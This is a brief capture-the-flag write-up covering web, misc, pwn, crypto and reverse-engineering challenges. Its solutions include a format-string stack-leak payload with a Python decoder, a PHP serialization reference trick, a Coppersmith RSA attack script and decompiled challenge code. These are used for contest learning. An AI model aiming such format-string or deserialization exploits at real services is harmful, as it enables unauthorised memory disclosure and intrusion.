Web
You're Better Than Shannon
Just read the source: 124.221.190.49/assets/index.9c4d6006.js

Run it in the console: flag{blue-whalerdle}
very old php game

old php game

Baby Unserialize
Use =& to make one variable a reference to another.
    <?php
    // fatal error if flag.php is not present locally
    require_once "flag.php";

    class Foo {
        private $i_am_flag;
        public $i_am_not_flag;

        public function __construct() {
            // =& binds the public property to the private one; serialize()
            // records the reference, so the link survives unserialize()
            $this->i_am_not_flag =& $this->i_am_flag;
        }
    }

    $a = new Foo;
    echo base64_encode(serialize($a));

Enterprise-Level Project Training
Log4j2

Misc
I'm missing a lot of tools; I'll fill them in over time.
Checkin

simplepcap
In Wireshark, export the raw data of the TCP connection.

Then reverse it in IDA.

warmatap
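Each key press maps to a different note, so just listen.
The challenge author's hand slipped and hit a few extra keys; just leave those out of the flag.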
bitjungle
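Blind-watermark extraction recovers another attachment.

Inside is an image, and the image contains an encrypted archive, which I couldn't open.
After the contest, people in the group chat said there was something at the end of the little yellow duck image, so I pulled it out to take a look. Only after converting it to UTF-8 did I find this:

Decode it with an online "beast-speak" translator: 兽音译者在线编码解码 - 兽音翻译咆哮体加密解密 (iiilab.com)

Extract the archive and get the flag.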
flag{bitjungle_@_2022ouc_security_competation}
PS: the advertisement didn't really land in the end; hardly anyone saw the flag.
Questionnaire
Skipped.
Pwn
flag_in_stack
A giveaway format-string bug.
%9$p%10$p%11$p%12$p%13$p%14$p


The final flag is
flag{22318482-897e-4e4a-9b99-b9389177f8f3}
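Added example, not part of the original write-up: how the six words leaked by %9$p through %14$p decode back into the flag, assuming an x86-64 little-endian target where the flag starts exactly at argument 9. The leak string is constructed here from the flag quoted on this page, and the function names are hypothetical.

```python
FLAG = b"flag{22318482-897e-4e4a-9b99-b9389177f8f3}"  # flag quoted on this page


def render_as_percent_p(data: bytes) -> str:
    """Constructed leak: print data as consecutive 8-byte stack words via %p."""
    words = []
    for off in range(0, len(data), 8):
        value = int.from_bytes(data[off:off + 8], "little")
        # glibc prints a zero pointer as "(nil)" and drops leading zeros
        words.append(hex(value) if value else "(nil)")
    return "".join(words)  # no separators, like %9$p%10$p...%14$p


def decode_percent_p(leak: str) -> bytes:
    """Recover the stack bytes from concatenated %p output."""
    # Splitting on "0x" is safe because 'x' is not a hex digit; a greedy
    # hex regex would swallow the '0' of the next "0x" prefix.
    tokens = leak.strip().replace("(nil)", "0x0").split("0x")[1:]
    out = b""
    for token in tokens:
        # pad back to a full word: "0x7d33" is really 33 7d 00 00 00 00 00 00
        out += int(token, 16).to_bytes(8, "little")
    return out.rstrip(b"\x00")


if __name__ == "__main__":
    leak = render_as_percent_p(FLAG)
    print(leak)
    print(decode_percent_p(leak).decode())
```

On the service side the fix is to pass user input as an argument, as in printf("%s", buf), never as the format string itself; gcc's -Wformat-security flags the pattern at compile time.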
Crypto
rsa0
There is an exploit available online; run it with Sage.

    n=99458509668079240764185524318888149882712572088614461971298107463369834453088459456711728470353911743012102202401459506420834538745340718629443665356118527820744084764722600596423213368145625200314910178619550190760027522939148808084672161717108834912031065957105792556025057670251126369910028034643093394503
    c1=89197280386921965661197790711420784410262382208534132234085116791910615673169858527481477831574905081301421275552903510097047200583014062866861073549357212721466816307907010360542055607004721289805632304584130841060138244596306574846436860126904020143491716153319277054077200643464827586604236845487354987915
    c2=45959797671430481467332101148072465819627575670155123389013237210739239421635837916637386390202868822695476269782607749447310008721672509747039543011018639490424678005705921693560042291238100913368239888847987849534236313165006247961048196341554357508978141969877614250433715368123748776872299192957911667056
    # polynomial ring over the integers mod n
    RR.<x>=Zmod(n)[]
    # quadratic (x - c1)(x - c2) mod n
    f=x**Integer(2)-(c1+c2)*x + c1*c2
    # Coppersmith small-roots search with bound 2^400
    f.small_roots(X=2^400)

Re
easyxor


xpu
Unpack the binary; the flag is Base64-encoded.

asm_master
gcc -c main.S -o main.o

oh_my_python
    $ uncompyle6 chall.pyc > chall.py
    $ cat chall.py
    def chall():
        flag = input()
        l = 'CKNOPWY_acfghkloruwy{}'
        index = [10, 14, 8, 11, 20, 0, 8, 2, 7, 6, 3, 17, 7, 1, 3, 5, 2, 7, 12, 3, 5, 7, 4, 19, 9, 7, 18, 15, 16, 13, 21]
        answer = ''
        for i in index:
            answer += l[i]

        if flag == answer:
            print 'Right!'
        else:
            print 'No!'


    if __name__ == '__main__':
        chall()
